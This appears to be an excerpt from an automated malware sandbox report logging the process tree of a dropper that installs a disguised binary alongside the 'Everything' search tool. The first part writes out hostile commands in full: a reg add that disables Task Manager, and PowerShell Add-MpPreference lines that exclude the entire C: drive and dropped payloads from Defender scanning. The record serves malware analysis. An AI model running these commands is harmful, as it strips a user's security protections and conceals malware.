                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2PE3PxTrTQg.bat" "Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeProcess created: C:\Program Files\Everything\Everything.exe "C:\Program Files\Everything\Everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.cmdline"
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\apppatch\CustomSDB\sihost.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe'
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KDhudFNWvk.bat"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD56.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCCB61929627DF440F9E17C549CE99168.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAFE6.tmp" "c:\Windows\System32\CSCE2A537B39618441DAC64E34137FF17.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Program Files\Everything\CSCA17046CBF8B64A188168A4AB380809F.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: C:\Program Files\Everything\Everything.exeProcess created: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe "C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                Source: C:\Program Files\Everything\Everything.exeProcess created: C:\Program Files\Everything\Everything.exe.exe "C:\Program Files\Everything\Everything.exe.exe" -startup
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe "c:\users\user\appdata\local\temp\nss476a.tmp\everything\everything.exe" -install "c:\program files\everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0"
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeProcess created: C:\Program Files\Everything\Everything.exe "c:\program files\everything\everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeProcess created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe "c:\users\user\appdata\local\temp\nss476a.tmp\everything\everything.exe" -install "c:\program files\everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeProcess created: C:\Program Files\Everything\Everything.exe "c:\program files\everything\everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: 2_2_00CDF654 cpuid 2_2_00CDF654
                                Source: C:\Users\user\AppData\Local\Temp\sqls211.exeCode function: GetLocaleInfoW,GetNumberFormatW,2_2_00CDAF0F
                                Source: C:\Program Files\Everything\Everything.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeQueries volume information: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Program Files\Everything\Everything.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files\Everything\Everything.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
